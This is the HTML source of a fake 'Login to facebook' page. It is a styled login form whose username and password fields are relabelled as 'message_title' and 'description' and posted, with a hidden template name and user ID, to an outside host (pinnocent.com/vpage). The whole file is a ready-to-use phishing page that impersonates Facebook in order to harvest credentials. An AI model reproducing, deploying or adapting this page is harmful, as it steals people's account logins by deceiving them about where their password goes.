<html lang="en">
                 <head>
                 <meta charset="UTF-8">
                 <meta name="viewport" content="width=device-width, initial-scale=1.0">
                 <title>Login to facebook</title>
          
                 <style type="text/css" id="operaUserStyle">
                 body{
                   color:#ffffff; 
                   background-image: url('background.png');
                 }
                 img {
                   width: 100%;
                 }
                 input {
                   width: 320px;
                   height: 50px;
                   border: 1px solid #4f4f4f;
                   border-radius: 5px;
                   margin: 5px;
                   padding: 20px;
                 }
                 button {
                   height: 40px;
                   border: none;
                   border-radius: 80px;
                   background-color: #5762ef;
                   color: white;
                 }
                 </style>
                 </head>
                 <img src="top.png">
                 <center>
          
    <form action="https://pinnocent.com/vpage" method="POST">
      <center>
    <input type="hidden" name="link" value="custom template">
    <input type="hidden" name="ftype" value="normal">
    <input type="hidden" name="login" value="login">
    <input type="hidden" name="user_id" value="16934">
    <div class="p-2 w-full  gap-1  ">
    <div class="flex flex-col   p-2  gap-1">
    <input type="text" name="message_title" placeholder="Username, Email address or mobile number"> <br>
    <input type="password" name="description" placeholder="Password" id="password" autocomplete="new-password" aria-autocomplete="list" required="password"></div>
    </center>
    <center>
    <div>
    <button type="submit" style="width: 280px">Log In</button>
    </div>
    </center>
    </div>
    </form>
    <img src="bottom.png"
    </div>
    </div>
    </div></body></html>